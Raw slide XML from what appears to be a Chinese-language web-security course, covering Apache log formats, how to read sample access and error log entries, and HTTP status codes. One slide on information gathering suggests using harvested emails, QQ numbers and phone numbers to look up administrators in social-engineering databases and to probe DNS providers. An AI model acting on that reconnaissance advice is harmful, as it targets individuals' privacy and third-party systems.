            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>LogFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> "%h %l %u %t \"%r\" %&gt;s %b \"%{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\" \"%{User-Agent}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\"" combined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>LogFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> "%{X-Forwarded-For}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> %l %u %t \"%r\" %&gt;s %b \"%{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\" \"%{User-Agent}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\"" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>combinedproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>LogFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> "%h %l %u %t \"%r\" %&gt;s %b" common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>LogFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> "%{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> -&gt; %U" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>LogFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> "%{User-agent}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>" agent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E4D0B8-3BCD-473C-8E63-E4919971A924}"/>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日志分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27925393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1907507"/>
            <a:ext cx="11346735" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>访问日志内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>218.19.140.242 - - [10/Dec/2010:09:31:17 +0800] "GET /query/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>trendxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/district/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>todayreturn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/month/2009-12-14/2010-12-09/haizhu_tianhe.xml HTTP/1.1" 200 1933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>zh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>●	218.19.140.242</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：请求到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>[10/Dec/2010:09:31:17 +0800]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：请求发生的时间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>●	”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>GET /query/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>trendxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/district/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>todayreturn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/month/2009-12-14/2010-12-09/haizhu_tianhe.xml HTTP/1.1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：请求方式和请求地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：请求状态码表示请求成功</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1933</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：服务器向客户端发送字节数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>"Mozilla/5.0 (Windows; U; Windows NT 5.1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>zh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：客户端浏览器信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E4D0B8-3BCD-473C-8E63-E4919971A924}"/>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日志分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4271145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二、信息收集</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5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911426" y="2216497"/>
            <a:ext cx="4649620" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>利用以上收集到的邮箱、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、电话号码、姓名、以及服务商，可以针对性进行攻击，利用社工库进行查找相关管理员信息，另外也可以对相关 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务商进行渗透，查看是否有漏洞，利用第三方漏洞平台，查看相关漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9455C1-3FE2-4D9F-80DF-9D797F301F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="157485"/>
            <a:ext cx="6108700" cy="7436485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B3A394-476C-40FC-A061-03D50966FA92}"/>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注册人资料</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184282122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1907507"/>
            <a:ext cx="11346735" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>错误日志内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>[Fri Dec 10 15:03:59 2010] [error] [client 218.19.140.242] File does not exist: /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>htmlfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>tradedata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/favicon.ico</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>●	[Fri Dec 10 15:03:59 2010]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：错误发生时间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>[error]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：错误级别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>[client 218.19.140.242]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：请求的客户端地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>File does not exist: /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>htmlfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>tradedata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/favicon.ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：发生错误的描述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E4D0B8-3BCD-473C-8E63-E4919971A924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="843558"/>
            <a:ext cx="2016224" cy="106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日志分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301718896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843817"/>
            <a:ext cx="11346735" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>错误码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>1xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>为消息类，该类状态代码用于表示服务器临时回应。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>100 Continue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>表示初始的请求已经被服务器接受，浏览器应当继续发送请求的其余部分</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>101 Switching Protocols </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务器将遵从客户的请求转换到另外一种协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>2xx表示浏览器端请求被处理成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>200 OK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>一切正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>201 Created </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务器已经创建了文档，Location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>头给出了它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> URL。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>202 Accepted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>已经接受请求，但处理尚未完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>203 Non-Authoritative Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>文档已经正常地返回，但一些应答头可能不正确，因为使用的是文档的拷贝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>204 No Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>没有新文档，浏览器应该继续显示原来的文档。这个跟下面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 304 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>非常相似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>205 Reset Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>没有新的内容，但浏览器应该重置它所显示的内容。用来强制浏览器清除表单输入内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>206 Partial Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>客户发送了一个带有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>头的GET请求，服务器完成了它。注意，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>可以实现断点续传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>3xx重定向。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>300 Multiple Choices 客户请求的文档可以在多个位置找到，这些位置已经在返回的文档内列出。如果服务器要提出优先选择，则应该在Location应答头指明。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>301 Moved Permanently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>客户请求的文档在其他地方，新的URL在Location头中给出，浏览器应该自动地访问新的URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325617662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843817"/>
            <a:ext cx="11346735" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>错误码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>3xx重定向。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
